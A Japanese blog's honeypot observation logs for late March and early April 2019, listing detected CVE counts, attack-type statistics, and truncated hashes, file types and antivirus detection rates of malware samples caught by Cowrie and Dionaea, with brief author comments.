5ffdc8b78... 2019/04/02 03:25:08 PE32 executable (DLL) (GUI) Intel 80386 60/68
88574a1df... 2019/04/02 03:42:10 PE32 executable (DLL) (GUI) Intel 80386 57/67
8b88b25cf... 2019/04/02 05:11:12 PE32 executable (DLL) (GUI) Intel 80386 46/66
3062df26e... 2019/04/02 05:11:53 PE32 executable (DLL) (GUI) Intel 80386 54/69
ca9fc4bdb... 2019/04/02 05:11:59 PE32 executable (DLL) (GUI) Intel 80386 40/68
e9c7680e6... 2019/04/02 11:36:37 PE32 executable (DLL) (GUI) Intel 80386 58/69
c5ff03fe7... 2019/04/02 14:12:39 PE32 executable (DLL) (GUI) Intel 80386 56/66
4c58581fa... 2019/04/02 15:46:31 PE32 executable (DLL) (GUI) Intel 80386 52/67
3a7ea4bb6... 2019/04/02 16:03:21 PE32 executable (DLL) (GUI) Intel 80386 56/66
135c4f212... 2019/04/02 16:15:49 PE32 executable (DLL) (GUI) Intel 80386 59/67
d540f05b1... 2019/04/02 16:16:40 PE32 executable (DLL) (GUI) Intel 80386 60/70
e5840a975... 2019/04/02 16:27:24 PE32 executable (DLL) (GUI) Intel 80386 59/67
004a28d1c... 2019/04/02 17:01:52 PE32 executable (DLL) (GUI) Intel 80386 62/70
5375d72f6... 2019/04/02 18:11:58 PE32 executable (DLL) (GUI) Intel 80386 52/62
dea76c8b9... 2019/04/02 19:43:09 PE32 executable (DLL) (GUI) Intel 80386 53/64
494753ed4... 2019/04/02 20:25:58 PE32 executable (DLL) (GUI) Intel 80386 57/66
e12d0c0ba... 2019/04/03 00:15:03 PE32 executable (DLL) (GUI) Intel 80386 54/64
24899e33d... 2019/04/03 01:28:32 PE32 executable (DLL) (GUI) Intel 80386 53/70
7c7262d9e... 2019/04/03 07:02:34 PE32 executable (DLL) (GUI) Intel 80386 56/65
9a1ae1d49... 2019/04/03 08:17:23 PE32 executable (DLL) (GUI) Intel 80386 60/69
9dc9f7073... 2019/04/03 09:34:37 PE32 executable (DLL) (GUI) Intel 80386 56/66
e9d1ba0ee... 2019/04/03 11:08:20 PE32 executable (DLL) (GUI) Intel 80386 57/66
dfac55e67... 2019/04/03 12:31:44 PE32 executable (DLL) (GUI) Intel 80386 62/70
ce62bd4a0... 2019/04/03 12:52:58 PE32 executable (DLL) (GUI) Intel 80386 54/63
840ee6a37... 2019/04/03 13:00:37 PE32 executable (DLL) (GUI) Intel 80386 54/67
59b5090fa... 2019/04/03 13:34:57 PE32 executable (DLL) (GUI) Intel 80386 59/67
c87283a83... 2019/04/03 13:49:14 PE32 executable (DLL) (GUI) Intel 80386 59/68
e7e3fa2e4... 2019/04/03 14:21:00 PE32 executable (DLL) (GUI) Intel 80386 63/71
e13c5a2cf... 2019/04/03 15:52:14 PE32 executable (DLL) (GUI) Intel 80386 55/66
1f3510824... 2019/04/03 18:01:29 PE32 executable (DLL) (GUI) Intel 80386 56/67
a0f7d345b... 2019/04/03 18:31:14 PE32 executable (DLL) (GUI) Intel 80386 58/67
dd9dacbe3... 2019/04/03 19:15:01 PE32 executable (DLL) (GUI) Intel 80386 55/64
2de98404e... 2019/04/03 22:21:06 PE32 executable (DLL) (GUI) Intel 80386 62/71
4891a63c1... 2019/04/03 23:18:55 PE32 executable (DLL) (GUI) Intel 80386 58/69
ce31acf4f... 2019/04/03 23:46:16 PE32 executable (DLL) (GUI) Intel 80386 59/69
90257ddb2... 2019/04/04 05:08:24 PE32 executable (DLL) (GUI) Intel 80386 56/64
01bdc6fb0... 2019/04/04 08:44:28 PE32 executable (DLL) (GUI) Intel 80386 58/68
cbd91d483... 2019/04/04 11:20:20 PE32 executable (DLL) (GUI) Intel 80386 57/70
ffe500010... 2019/04/04 15:41:36 PE32 executable (DLL) (GUI) Intel 80386 63/71
ede5b5290... 2019/04/04 16:13:18 PE32 executable (DLL) (GUI) Intel 80386 56/67
57967b6e7... 2019/04/04 19:24:40 PE32 executable (DLL) (GUI) Intel 80386 59/67
f4467cf9b... 2019/04/04 21:48:05 PE32 executable (DLL) (GUI) Intel 80386 58/68
1a8996bae... 2019/04/05 00:04:07 PE32 executable (DLL) (GUI) Intel 80386 56/65
d7898fd7e... 2019/04/05 00:24:06 PE32 executable (DLL) (GUI) Intel 80386 57/65
d35115a45... 2019/04/05 01:10:04 PE32 executable (DLL) (GUI) Intel 80386 59/69
e9e60daee... 2019/04/05 03:12:17 PE32 executable (DLL) (GUI) Intel 80386 53/64
f63b8c272... 2019/04/05 04:22:55 PE32 executable (DLL) (GUI) Intel 80386 60/71
160b8ceeb... 2019/04/05 05:35:23 PE32 executable (DLL) (GUI) Intel 80386 57/68
fecedeedc... 2019/04/05 09:19:43 PE32 executable (DLL) (GUI) Intel 80386 56/65
d8730841f... 2019/04/05 10:23:28 PE32 executable (DLL) (GUI) Intel 80386 56/65
fdea89006... 2019/04/05 11:30:37 PE32 executable (DLL) (GUI) Intel 80386 59/68
3c3591eb1... 2019/04/05 13:18:34 PE32 executable (DLL) (GUI) Intel 80386 57/65
fcb6b0f95... 2019/04/05 14:15:52 PE32 executable (DLL) (GUI) Intel 80386 57/65
98593450d... 2019/04/05 17:39:06 PE32 executable (DLL) (GUI) Intel 80386 61/69
ac0c78b07... 2019/04/06 01:28:01 PE32 executable (DLL) (GUI) Intel 80386 56/68
a48ca7b40... 2019/04/06 02:09:34 PE32 executable (DLL) (GUI) Intel 80386 54/65

所感

イランからの攻撃を多く検知した一週間でした。

ハニーポット #ハニーポット観察

ばぁどのハニーポット・うぉっちんぐ - 2019/03/23 ~ 2019/03/29 -

ハニーポット観察日記としての定期アウトプットです。

観察期間:2019年 03月23日 00:00:00 - 2019年03月29日 23:59:59

CVE

CVE 検知した回数 前回比
CVE-2010-3055 22 +12
CVE-2014-0160 16 0
CVE-2017-7269 3 -8
CVE-2003-0818 2 -2
CVE-2015-1427 2 +2
CVE-2017-0143 1 0
CVE-2005-4050 1 +1

攻撃種別

f:id:UltraBirdTech:20190330100514p:plain

攻撃種別 カウント数 % 前回カウント数
known attacker 55931 92.07% 94754
bad reputation 4692 7.72% 3763
合計 60748
平均(集計2018年11月〜) 57471回

マルウェア

Cowrie

Total: 27

File Name Date Type Detection Rate
tmp6NUtyC 2019/03/22 03:33:01 ELF 32-bit LSB executable 39/56
a52e5c9d3... 2019/03/22 03:50:24 OpenSSH RSA public key 0/57
0293300dd... 2019/03/22 08:01:57 ASCII text 0/57
20ceeed36... 2019/03/22 08:01:57 ASCII text 0/55
d660d1120... 2019/03/22 08:01:57 ASCII text 0/54
8779e030c... 2019/03/22 08:01:57 ASCII text 0/57
512893f96... 2019/03/22 08:01:57 ASCII text 0/55
5ab400ec0... 2019/03/22 08:01:57 ASCII text 0/57
f6426a2b8... 2019/03/22 08:01:57 ASCII text 0/58
d1858ce41... 2019/03/22 08:01:57 ASCII text 0/58
tmpY2s5Rv 2019/03/22 13:46:32 ELF 32-bit LSB executable 39/56
tmpeqd6ze 2019/03/23 03:32:07 ELF 32-bit LSB executable 40/58
tmpNCiwvH 2019/03/23 13:23:06 ELF 32-bit LSB executable 40/58
tmpOzFHSv 2019/03/23 21:22:26 ELF 32-bit LSB executable 40/58
tmpasXB3p 2019/03/24 03:43:29 ELF 32-bit LSB executable 39/56
b33b30c3c... 2019/03/24 03:43:29 Bourne-Again shell script executable (binary data) 27/55
tmpnXIIPC 2019/03/24 22:37:32 ELF 32-bit LSB executable 39/56
tmpEE_J4Z 2019/03/25 02:48:35 ELF 32-bit LSB executable 38/56
b01ae8eba... 2019/03/25 08:09:23 ASCII text 0/57
tmpqz4QNy 2019/03/25 14:10:51 ELF 32-bit LSB executable 38/56
tmpIR99d8 2019/03/25 20:26:57 ELF 32-bit LSB executable 38/56
tmpIzzP2P 2019/03/26 03:29:37 ELF 32-bit LSB executable 37/56
tmpeNPKyr 2019/03/26 14:02:00 ELF 32-bit LSB executable 37/56
tmp3j6jQ3 2019/03/27 03:30:45 ELF 32-bit LSB executable 38/58
tmpS0omvr 2019/03/27 21:05:25 ELF 32-bit LSB executable 38/58
tmpe_ke1H 2019/03/28 03:29:59 ELF 32-bit LSB executable 38/56
tmpzJqQnz 2019/03/28 20:45:08 ELF 32-bit LSB executable 38/56

Dionaea

Total: 100

File Name Date Type Detection Rate
8c81ab1ed... 2019/03/22 03:36:19 PE32 executable (DLL) (GUI) Intel 80386 49/66
8e6bfea06... 2019/03/22 03:58:48 PE32 executable (DLL) (GUI) Intel 80386 61/70
996c2b2ca... 2019/03/22 04:30:07 PE32 executable (DLL) (GUI) Intel 80386 56/65
414a3594e... 2019/03/22 04:41:58 PE32 executable (DLL) (GUI) Intel 80386 61/70
235e9af4c... 2019/03/22 05:15:48 PE32 executable (DLL) (GUI) Intel 80386 49/66
abff40681... 2019/03/22 05:37:50 PE32 executable (DLL) (GUI) Intel 80386 56/69
d31d25eed... 2019/03/22 09:51:32 PE32 executable (DLL) (GUI) Intel 80386 48/59
cf4f46336... 2019/03/22 10:07:25 PE32 executable (DLL) (GUI) Intel 80386 60/70
95ae8e32e... 2019/03/22 10:34:07 PE32 executable (DLL) (GUI) Intel 80386 57/65
7700ced8e... 2019/03/22 12:35:55 PE32 executable (DLL) (GUI) Intel 80386 57/67
ae12bb54a... 2019/03/22 13:24:05 PE32 executable (DLL) (GUI) Intel 80386 56/65
879d69d4c... 2019/03/22 13:31:59 PE32 executable (DLL) (GUI) Intel 80386 55/65
01a0709a4... 2019/03/22 15:23:10 PE32 executable (DLL) (GUI) Intel 80386 57/67
ce494e90f... 2019/03/22 15:26:28 PE32 executable (DLL) (GUI) Intel 80386 63/70
ea6cdc1ad... 2019/03/22 15:31:28 PE32 executable (DLL) (GUI) Intel 80386 58/69
0ab2aeda9... 2019/03/22 15:59:59 PE32 executable (DLL) (GUI) Intel 80386 61/70
6e72ad805... 2019/03/22 16:07:54 PE32 executable (DLL) (GUI) Intel 80386 58/66
f1e05cb78... 2019/03/22 16:22:03 PE32 executable (DLL) (GUI) Intel 80386 59/69
cbd91d483... 2019/03/22 16:52:04 PE32 executable (DLL) (GUI) Intel 80386 50/64
47bc7c8f1... 2019/03/22 17:06:12 PE32 executable (DLL) (GUI) Intel 80386 58/66
ed39402aa... 2019/03/22 17:51:51 PE32 executable (DLL) (GUI) Intel 80386 55/64
53b9933f3... 2019/03/22 21:53:15 PE32 executable (DLL) (GUI) Intel 80386 59/69
89913a42a... 2019/03/22 22:47:00 PE32 executable (DLL) (GUI) Intel 80386 57/66
e9d1ba0ee... 2019/03/23 01:10:27 PE32 executable (DLL) (GUI) Intel 80386 62/71
a9ea052fb... 2019/03/23 03:40:35 PE32 executable (DLL) (GUI) Intel 80386 54/70
9ba5379aa... 2019/03/23 05:33:19 PE32 executable (DLL) (GUI) Intel 80386 62/71
772062d5f... 2019/03/23 06:19:30 PE32 executable (DLL) (GUI) Intel 80386 60/70
cd99e5e4f... 2019/03/23 07:27:20 PE32 executable (DLL) (GUI) Intel 80386 58/66
e401c39e2... 2019/03/23 09:00:08 PE32 executable (DLL) (GUI) Intel 80386 58/67
856e92809... 2019/03/23 10:07:02 PE32 executable (DLL) (GUI) Intel 80386 55/64
e5840a975... 2019/03/23 10:20:01 PE32 executable (DLL) (GUI) Intel 80386 61/69
2c297687e... 2019/03/23 10:20:29 PE32 executable (DLL) (GUI) Intel 80386 63/71
aa718a028... 2019/03/23 10:23:14 PE32 executable (DLL) (GUI) Intel 80386 57/65
a4d49eaf6... 2019/03/23 10:47:30 PE32 executable (DLL) (GUI) Intel 80386 57/67
8656c594e... 2019/03/23 10:54:59 PE32 executable (DLL) (GUI) Intel 80386 52/66
a34d8bd74... 2019/03/23 11:20:24 PE32 executable (DLL) (GUI) Intel 80386 56/65
4a4de629b... 2019/03/23 17:18:51 PE32 executable (DLL) (GUI) Intel 80386 55/65
ed03cfcc8... 2019/03/23 19:04:35 PE32 executable (DLL) (GUI) Intel 80386 53/62
ef894d1c6... 2019/03/23 21:13:41 PE32 executable (DLL) (GUI) Intel 80386 61/70
b68bce945... 2019/03/23 22:00:24 PE32 executable (DLL) (GUI) Intel 80386 59/69
ed979ce49... 2019/03/23 22:16:30 PE32 executable (DLL) (GUI) Intel 80386 62/70
be4b64105... 2019/03/23 22:34:05 PE32 executable (DLL) (GUI) Intel 80386 52/68
a55b9addb... 2019/03/23 23:31:48 PE32 executable (DLL) (GUI) Intel 80386 62/70
bb980b122... 2019/03/24 01:05:54 PE32 executable (DLL) (GUI) Intel 80386 53/63
71f83a9a6... 2019/03/24 12:25:11 PE32 executable (DLL) (GUI) Intel 80386 59/69
bc1dca28a... 2019/03/24 12:39:59 PE32 executable (DLL) (GUI) Intel 80386 58/69
5f4c11dd7... 2019/03/24 15:28:30 PE32 executable (DLL) (GUI) Intel 80386 46/69
0ab9a60a5... 2019/03/24 16:00:33 PE32 executable (DLL) (GUI) Intel 80386 49/59
1a8996bae... 2019/03/24 18:27:17 PE32 executable (DLL) (GUI) Intel 80386 56/65
8831cfc4b... 2019/03/24 20:54:13 PE32 executable (DLL) (GUI) Intel 80386 52/69
8337e6b54... 2019/03/25 00:41:22 PE32 executable (DLL) (GUI) Intel 80386 58/68
7823636f9... 2019/03/25 01:16:58 PE32 executable (DLL) (GUI) Intel 80386 58/69
398c9ce41... 2019/03/25 04:25:33 PE32 executable (DLL) (GUI) Intel 80386 56/65
80fcce7ab... 2019/03/25 10:38:51 PE32 executable (DLL) (GUI) Intel 80386 51/66
e8feae1b8... 2019/03/25 11:41:40 PE32 executable (DLL) (GUI) Intel 80386 49/67
2f76b88b4... 2019/03/25 12:38:50 PE32 executable (DLL) (GUI) Intel 80386 58/68
8d340ce81... 2019/03/25 13:28:31 PE32 executable (DLL) (GUI) Intel 80386 58/66
fa9dae0c8... 2019/03/25 14:01:54 PE32 executable (DLL) (GUI) Intel 80386 53/62
3aed2a6fb... 2019/03/25 14:30:43 PE32 executable (DLL) (GUI) Intel 80386 54/64
4fbfa7542... 2019/03/25 15:41:56 PE32 executable (DLL) (GUI) Intel 80386 55/65
6633a1960... 2019/03/25 17:11:05 PE32 executable (DLL) (GUI) Intel 80386 61/71
62186bebf... 2019/03/26 05:00:20 PE32 executable (DLL) (GUI) Intel 80386 62/71
700d24be6... 2019/03/26 06:27:51 PE32 executable (DLL) (GUI) Intel 80386 55/64
8fa0e5dd9... 2019/03/26 10:54:18 PE32 executable (DLL) (GUI) Intel 80386 58/69
3a6215c66... 2019/03/26 15:37:51 PE32 executable (DLL) (GUI) Intel 80386 55/63
50b93e08b... 2019/03/26 16:04:38 PE32 executable (DLL) (GUI) Intel 80386 63/71
fff02c3a8... 2019/03/26 16:13:12 PE32 executable (DLL) (GUI) Intel 80386 55/66
24899e33d... 2019/03/26 17:16:06 PE32 executable (DLL) (GUI) Intel 80386 53/70
f9d70ea0d... 2019/03/26 18:21:32 PE32 executable (DLL) (GUI) Intel 80386 59/67
6a98c515a... 2019/03/27 00:37:41 PE32 executable (DLL) (GUI) Intel 80386 59/70
28b85a5e6... 2019/03/27 05:23:56 PE32 executable (DLL) (GUI) Intel 80386 56/67
e2766703b... 2019/03/27 07:43:57 PE32 executable (DLL) (GUI) Intel 80386 54/65
b294e857d... 2019/03/27 10:43:25 PE32 executable (DLL) (GUI) Intel 80386 56/64
e6a999cd5... 2019/03/27 10:45:03 PE32 executable (DLL) (GUI) Intel 80386 54/63
a080ecd5c... 2019/03/27 11:11:31 PE32 executable (DLL) (GUI) Intel 80386 52/64
8b88b25cf... 2019/03/27 12:51:36 PE32 executable (DLL) (GUI) Intel 80386 46/66
508c6233b... 2019/03/27 14:13:45 PE32 executable (DLL) (GUI) Intel 80386 56/70
bdcaf7ef3... 2019/03/27 15:45:02 PE32 executable (DLL) (GUI) Intel 80386 57/65
fe2643f06... 2019/03/27 17:26:30 PE32 executable (DLL) (GUI) Intel 80386 60/70
9a2863dd6... 2019/03/27 17:49:00 PE32 executable (DLL) (GUI) Intel 80386 55/65
15042cc72... 2019/03/27 22:28:00 PE32 executable (DLL) (GUI) Intel 80386 57/69
01d87121a... 2019/03/27 22:49:58 PE32 executable (DLL) (GUI) Intel 80386 54/66
37cdee43f... 2019/03/27 23:09:18 PE32 executable (DLL) (GUI) Intel 80386 54/63
98abe2619... 2019/03/27 23:16:40 PE32 executable (DLL) (GUI) Intel 80386 58/68
23d048d04... 2019/03/27 23:30:22 PE32 executable (DLL) (GUI) Intel 80386 60/69
2e93c819b... 2019/03/28 02:19:53 PE32 executable (DLL) (GUI) Intel 80386 56/69
15dbd9772... 2019/03/28 05:28:56 PE32 executable (DLL) (GUI) Intel 80386 60/70
aa2e6a964... 2019/03/28 06:30:51 PE32 executable (DLL) (GUI) Intel 80386 53/64
da2506e63... 2019/03/28 07:24:17 PE32 executable (DLL) (GUI) Intel 80386 58/66
dbff8fcc3... 2019/03/28 10:43:40 PE32 executable (DLL) (GUI) Intel 80386 62/71
a9005a717... 2019/03/28 11:07:25 PE32 executable (DLL) (GUI) Intel 80386 59/68
f47767aaa... 2019/03/28 12:26:13 PE32 executable (DLL) (GUI) Intel 80386 62/70
dfac55e67... 2019/03/28 14:20:24 PE32 executable (DLL) (GUI) Intel 80386 57/65
f25a4f0a0... 2019/03/28 19:08:32 PE32 executable (DLL) (GUI) Intel 80386 55/64
4c009243c... 2019/03/28 19:16:19 PE32 executable (DLL) (GUI) Intel 80386 56/66
c16edec91... 2019/03/28 20:26:16 PE32 executable (DLL) (GUI) Intel 80386 57/65
01bdc6fb0... 2019/03/28 20:55:36 PE32 executable (DLL) (GUI) Intel 80386 58/65
c43f4ae58... 2019/03/28 21:46:02 PE32 executable (DLL) (GUI) Intel 80386 61/70
d79e74b90... 2019/03/28 23:57:27 PE32 executable (DLL) (GUI) Intel 80386 61/69
5818d137c... 2019/03/29 00:52:51 PE32 executable (DLL) (GUI) Intel 80386 55/70

所感

今年度最後のハニーポット観察日誌。 なんだかんだ一年続いた。

ハニーポット #ハニーポット観察